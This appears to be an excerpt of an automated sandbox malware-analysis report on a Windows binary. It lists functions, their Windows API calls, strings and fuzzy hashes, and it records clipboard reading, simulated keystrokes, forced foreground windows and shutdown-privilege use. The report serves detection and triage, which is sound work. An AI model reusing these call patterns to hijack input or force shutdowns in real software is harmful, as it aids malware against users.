Instruction ID: 352e0a56757a29f70fda5dbbd02c219ebdc15a73ecec0d8b306ef4bd3729acd0
Opcode Fuzzy Hash: cf883bd2fe04d4a07ca51566a703a3cd097dd1853a5e94b071277c6f3932a8ef
Instruction Fuzzy Hash: FCF0F030841202AAFF706B629C46B5F7BA0AF00768F20011FF4102A1D1CB3C5D41AA8C

Function 00449A38 Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00449A5A

Part of subcall function 0044C6DB: RtlEnterCriticalSection.NTDLL(?), ref: 0044C703

RtlAllocateHeap.NTDLL(00000000,?,0045B068), ref: 00449A9B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AllocateCriticalEnterHeapSection__lock
String ID:
API String ID: 409319249-0
Opcode ID: ba8956f323e289275a4f63e35acf058c2551b89be229d334ec6b190de484c1ae
Instruction ID: fdb724486434b2d6e8ccd2904e3ef89b22f67d2e8c8e0598606752c53c52e891
Opcode Fuzzy Hash: ba8956f323e289275a4f63e35acf058c2551b89be229d334ec6b190de484c1ae
Instruction Fuzzy Hash: 3DF0C231C502509BEB60ABA19C0675F7360AB00768F20422EE8207A2F1C73C5C05A78C

Function 0044E07D Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,0044BF66,00000001,?,0045B1B8,00000060), ref: 0044E08E

Part of subcall function 0044E0CE: RtlAllocateHeap.NTDLL(00000000,00000140,0044E0B6), ref: 0044E0DB

HeapDestroy.KERNEL32(?,0045B1B8,00000060), ref: 0044E0C1

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Heap$AllocateCreateDestroy
String ID:
API String ID: 316229882-0
Opcode ID: a2267900713be7d8cbac622d64c56fe0b2f8973e4e4a166c9e297e1a64908aa3
Instruction ID: ca41273765c5c3aab36d8d05c3b896e55048c7fa67c0c8062e034f08bda47014
Opcode Fuzzy Hash: a2267900713be7d8cbac622d64c56fe0b2f8973e4e4a166c9e297e1a64908aa3
Instruction Fuzzy Hash: 60E048706613109AFB546B736C0572A36D4FB44747F004C3EF465C61E0EBB8CC449709

Function 00416168 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

EnumResourceNamesW.KERNEL32(00000000,0000000E,0041605B,000000A1,004012E6,000000A1,?,?,?,?,?,?,?,00401243,?,?), ref: 00416192
LoadImageW.USER32(000000A1,00000001,00000010,00000010,00000000,004012E6), ref: 004161B3

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID:
API String ID: 1578290342-0
Opcode ID: 249b71e9550ada3b2cdf6ed6da1a3c1595c538e7d83d5dc9b0de724d6460e20e
Instruction ID: 388dc2f8e504b4818ad8221c326ea7f1357133d35e6b367d3968a5e83fac51bc
Opcode Fuzzy Hash: 249b71e9550ada3b2cdf6ed6da1a3c1595c538e7d83d5dc9b0de724d6460e20e
Instruction Fuzzy Hash: D2F06D70244300BBFB218F95ED49B5A3BA5AB40B5AF100D2AF104A55F0E3F4CA90DB9E

Function 0044FD57 Relevance: 2.6, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,00000000,00455E82,00000000), ref: 0044FD91
GetLastError.KERNEL32 ref: 0044FD9B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 4ebd943a157eb07ac9634cd6ca5a110ba93b6a05e5397113cf76f4c5a41d9ed1
Instruction ID: dfd6dc24ececc12b093a21fe2a3d80e4ea14aafa4b6e7905c67d2704a465acd5
Opcode Fuzzy Hash: 4ebd943a157eb07ac9634cd6ca5a110ba93b6a05e5397113cf76f4c5a41d9ed1
Instruction Fuzzy Hash: 3601F73AD0165155E7243639680AA5F22548FC1326F25097FF822C72C3DE1CC849419E

Function 00443162 Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 004168A2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0045C6D0,?,?,?,00442C32,00000000,0045C6D0), ref: 004168CE

_strcat.LIBCMT ref: 00443184

Part of subcall function 00449C88: __lock.LIBCMT ref: 00449CA6
Part of subcall function 00449C88: RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C6BF,00000000,0045B3A0,00000008,0044C6F4,?,?,?,00449A5F,00000004,0045B068,0000000C), ref: 00449CED

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharFreeHeapMultiWide__lock_strcat
String ID:
API String ID: 4005365108-0
Opcode ID: 0752198bd6ff27b4f4bc917dc383f3400b97698580d51902ef1d9cfc77702165
Instruction ID: 279db9349b9432370442bca1a9a1493b0779058484bbe6e66891083dc9997760
Opcode Fuzzy Hash: 0752198bd6ff27b4f4bc917dc383f3400b97698580d51902ef1d9cfc77702165
Instruction Fuzzy Hash: E641CF71900208BBEB20EF62CC86EDFB7B9EF44704F10049FF554A2181D77AAB509B59

Function 004183F6 Relevance: 1.5, APIs: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00418410

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 291f538a9b433d0a6d1e82d5f98e660a5483061f2c47a20ab654f08d6a09c4c0
Instruction ID: d2bd3d490d9ddfc467a21e27a978dfc4666dbaf1305854362b7c44e4a4fbedf9
Opcode Fuzzy Hash: 291f538a9b433d0a6d1e82d5f98e660a5483061f2c47a20ab654f08d6a09c4c0
Instruction Fuzzy Hash: 70016D314009128BEB306F16D881AEAB7E5AF50725F31482FF88186221EF6D9CC29A5D

Function 004129C0 Relevance: 1.5, APIs: 1, Instructions: 33windowCOMMON

Download Yara Rule

APIs

CreateIcon.USER32(00000020,00000020,00000001,00000001,?,?), ref: 00412A12

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CreateIcon
String ID:
API String ID: 3625662491-0
Opcode ID: 3275a5c83641fd64901501d8a465da21f4f6a3dcd75cd0197712b1158f272966
Instruction ID: 8f4eba20f0dd3c68f254ecd256194a12db5acd5393f4aab0f61f7e9ed3e12a4c
Opcode Fuzzy Hash: 3275a5c83641fd64901501d8a465da21f4f6a3dcd75cd0197712b1158f272966
Instruction Fuzzy Hash: 50F05471A40219BAEB21AA64DC46FDAB2ACBB08704F000476F605F21C1E6F46D548B98

Function 00414E55 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00414BDE,?), ref: 00414E59

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c703b52854d76aa319161c5b99ab3c341fa8d321b596a499fcd6fceaba77e700
Instruction ID: a7fd8ca27bb0810053334d820270db7b5587be9ae11b805182a5f761d4f63fd8
Opcode Fuzzy Hash: c703b52854d76aa319161c5b99ab3c341fa8d321b596a499fcd6fceaba77e700
Instruction Fuzzy Hash: 2AC09B34000F105DDE640E385A4D0DA375179C27A5FD41791D479451F2D3394C57F605

Function 0043138D Relevance: 1.3, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE(0045C6D0,00000000,?,0041F99E), ref: 004313CD

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: c0d1d7e33a4943827e01e4cfbbef932bc404c85381f4d3483751c997e5f8ecfc
Instruction ID: df3736b00b7e0be589f0f43ae73a18a9a167cadeb1283b1792a52ecf7f174830
Opcode Fuzzy Hash: c0d1d7e33a4943827e01e4cfbbef932bc404c85381f4d3483751c997e5f8ecfc
Instruction Fuzzy Hash: 3CE02B71281341DFD720AB709C544673B5ADB88305F185DBFD84687623EEB51886C71D

Function 00413E1F Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,00413C39,0045C6D0,0040FFF4,0045C6D0,?,?,004105B4,00000000,0047BD30,00000000,0045C6D0,00000000,00000000,0045C6D0), ref: 00413E2F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9bfc3fda799452cefd9afc6750f5b897df70f21d9868be3a5e5485ce3cadb6bc
Instruction ID: 8d68155d35ff6e49382bc72b4325340e3a7c1b0e2115fedd8b061b5066a75610
Opcode Fuzzy Hash: 9bfc3fda799452cefd9afc6750f5b897df70f21d9868be3a5e5485ce3cadb6bc
Instruction Fuzzy Hash: D0E092B2406B81DF87209F9A95C0447FBE4BA0871A360883FE0DE82A01C378A4858E1A

Non-executed Functions

Function 004045EC Relevance: 127.5, APIs: 68, Strings: 4, Instructions: 1483windowfileCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00404726
GetCursorPos.USER32(?), ref: 00404730
ScreenToClient.USER32(?,?), ref: 00404749
WindowFromPoint.USER32(?,?), ref: 00404788
SetCapture.USER32(?,?,?,?), ref: 004050AE
CharUpperBuffW.USER32(?,?,@GUI_DRAGID,?,?,?,?), ref: 004050E5
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00405135
PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0040515F
GetMenuItemInfoW.USER32(?,?,00000000,0000002C), ref: 0040523D
GetMenuItemCount.USER32(?), ref: 00405256
GetMenuItemID.USER32(?,00000000), ref: 00405265
GetMenuItemInfoW.USER32(?,-00000001,00000001,0000002C), ref: 0040528E
GetMenuItemInfoW.USER32(?,?,00000001,0000002C), ref: 004052B4
CheckMenuRadioItem.USER32(?,?,?,?,00000400), ref: 004052D4
FreeLibrary.KERNEL32(?,?,?,?), ref: 00405521
DragQueryPoint.SHELL32(?,?), ref: 00405533
SendMessageW.USER32(?,000000B0,?,?), ref: 0040558D
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00405596
DragQueryFileW.SHELL32(?,?,?,00000104), ref: 004055BD
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00405600
SendMessageW.USER32(?,000000B0,?,?), ref: 00405610
SendMessageW.USER32(?,000000B1,?,?), ref: 0040561A
SendMessageW.USER32(?,000000B1,?,?), ref: 0040562F
DragFinish.SHELL32(?,?,?,?), ref: 00405634
CharUpperBuffW.USER32(?,?,@GUI_DROPID,00000000,?,?,?,?), ref: 00405676
CharUpperBuffW.USER32(?,?,@GUI_DRAGID,000000FF,0047BD20,?,?,?,?,?), ref: 004056B3
CharUpperBuffW.USER32(?,?,@GUI_DRAGFILE,?,0047BD20,?,?,?,?,?), ref: 004056F0
ReleaseCapture.USER32 ref: 00405771
SetWindowTextW.USER32(?,00000000), ref: 004057FD
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0040580D
CharUpperBuffW.USER32(?,?,@GUI_DROPID,?), ref: 00405846
CharUpperBuffW.USER32(?,?,@GUI_DRAGFILE,?,0047BD20,?,?), ref: 0040588A
ClientToScreen.USER32(?,?), ref: 00405110

Part of subcall function 004183F6: VariantClear.OLEAUT32(?), ref: 00418410

Part of subcall function 0040D33A: SendMessageW.USER32(?,00000136,?,?), ref: 0040D3BF
Part of subcall function 0040D33A: GetSysColorBrush.USER32(00000005), ref: 0040D3D0
Part of subcall function 0040D33A: GetClientRect.USER32(?,?), ref: 0040D3E0
Part of subcall function 0040D33A: SetViewportOrgEx.GDI32(?,00000000,00000000,?), ref: 0040D3F3
Part of subcall function 0040D33A: FillRect.USER32(?,?,?), ref: 0040D3FD
Part of subcall function 0040D33A: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0040D40B

ClientToScreen.USER32(?,?), ref: 004058F4

Strings

@GUI_DRAGFILE, xrefs: 004056DD, 00405877
@GUI_DROPID, xrefs: 0040565D, 00405833
@GUI_DRAGID, xrefs: 004050D2, 004056A0
su, xrefs: 00405521

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Message$Send$BuffCharItemMenuUpper$Client$DragRect$InfoQueryScreen$CaptureFilePointViewportWindow$BrushCheckClearColorCountCursorFillFinishFreeFromInvalidateLibraryPostRadioReleaseTextVariant
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$su
API String ID: 3013014237-2468357259
Opcode ID: 81e1574966f57f205d7eb795094569a6c03c1e869b79b0831d0879e1c5b5466f
Instruction ID: a85160cf80a5b1f34019e14a663ad150d6ae3ef56b36cf0b8cda9c9ba50d982b
Opcode Fuzzy Hash: 81e1574966f57f205d7eb795094569a6c03c1e869b79b0831d0879e1c5b5466f
Instruction Fuzzy Hash: 38C27B71500649AFDF259F68CC84BEE3BA9EF04314F14012AFA11A72E2D779E851CF99

Function 00412196 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 120keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,00000000,?,00000000), ref: 0041219B
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004121C0
IsIconic.USER32(?), ref: 004121C9
ShowWindow.USER32(?,00000009), ref: 004121D6
SetForegroundWindow.USER32(?), ref: 004121DD
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004121F4
GetCurrentThreadId.KERNEL32 ref: 004121FC
GetWindowThreadProcessId.USER32(?,00000000), ref: 0041220D
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0041221D
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00412223
AttachThreadInput.USER32(00000000,?,00000001), ref: 0041222C
SetForegroundWindow.USER32(?), ref: 00412232
MapVirtualKeyW.USER32(00000012,00000000), ref: 0041224B
keybd_event.USER32(00000012,00000000), ref: 00412256
MapVirtualKeyW.USER32(00000012,00000000), ref: 0041225E
keybd_event.USER32(00000012,00000000), ref: 00412263
MapVirtualKeyW.USER32(00000012,00000000), ref: 0041226A
keybd_event.USER32(00000012,00000000), ref: 0041226F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00412277
keybd_event.USER32(00000012,00000000), ref: 0041227C
SetForegroundWindow.USER32(?), ref: 00412282
AttachThreadInput.USER32(00000000,?,00000000), ref: 0041229A
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0041229F

Strings

Shell_TrayWnd, xrefs: 004121BB

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 2889586943-2988720461
Opcode ID: 27bde8f325f4ca65f9c45f11051872c97efc407ea39f8a14d5d8c1b3cfdf20f6
Instruction ID: cb7438905b74c3bcc21d4994487d953355f125afc937cec0d547d7a337ec13bb
Opcode Fuzzy Hash: 27bde8f325f4ca65f9c45f11051872c97efc407ea39f8a14d5d8c1b3cfdf20f6
Instruction Fuzzy Hash: 7131D47250030CBFE611AF62DD89E7F7EACDB89B95F020429F60492192D676DC20DA76

Function 0042A322 Relevance: 31.7, APIs: 21, Instructions: 165clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0045C6D0), ref: 0042A34E
IsClipboardFormatAvailable.USER32(0000000D), ref: 0042A35C
GetClipboardData.USER32(0000000D), ref: 0042A364
CloseClipboard.USER32 ref: 0042A370

Part of subcall function 0041684E: _strlen.LIBCMT ref: 0041685F
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416879
Part of subcall function 0041684E: MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0047BD30,?,?,00410545,00000000), ref: 00416898

GlobalLock.KERNEL32(00000000), ref: 0042A37D
GlobalUnlock.KERNEL32(00000000), ref: 0042A38E
IsClipboardFormatAvailable.USER32(00000001), ref: 0042A39B
GetClipboardData.USER32(00000001), ref: 0042A3A3
GlobalLock.KERNEL32(00000000), ref: 0042A3B0
CloseClipboard.USER32 ref: 0042A3BA
IsClipboardFormatAvailable.USER32(0000000F), ref: 0042A3E5
GetClipboardData.USER32(0000000F), ref: 0042A3F1
CloseClipboard.USER32 ref: 0042A3FF
GlobalLock.KERNEL32(00000000), ref: 0042A40B
CloseClipboard.USER32 ref: 0042A415
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0042A437
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0042A455
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0042A48A
GlobalUnlock.KERNEL32(00000000), ref: 0042A4AA
CountClipboardFormats.USER32 ref: 0042A4BF
CloseClipboard.USER32 ref: 0042A4DA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Clipboard$CloseGlobal$AvailableDataDragFileFormatLockQuery$ByteCharMultiUnlockWide$CountFormatsOpen_strlen
String ID:
API String ID: 2574986921-0
Opcode ID: e1dd125d9a88cc09583c45a5a8a274419ec46e367697b661965c693209983685
Instruction ID: 2cdc2f06eb618e585f5a6265f66a70c7a1ebf7fce3b87c4d366946daf1d9761b
Opcode Fuzzy Hash: e1dd125d9a88cc09583c45a5a8a274419ec46e367697b661965c693209983685
Instruction Fuzzy Hash: E351B335704225FBDB10BBB0AC49BEF3768AF04716F500167FD02E61D2DA78DE518A6A

Function 00415C2E Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 64shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C47
OpenProcessToken.ADVAPI32(00000000), ref: 00415C4E
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415C64
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415C83
GetLastError.KERNEL32 ref: 00415C89
EnumWindows.USER32(00415CDD,00000000), ref: 00415CB0
ExitWindowsEx.USER32(?,00000000), ref: 00415CC2
SetSystemPowerState.KERNEL32(00000000,00000000), ref: 00415CD4

Strings

SeShutdownPrivilege, xrefs: 00415C5C
, xrefs: 00415CCC
, xrefs: 00415CB6
@, xrefs: 00415CBB

Memory Dump Source

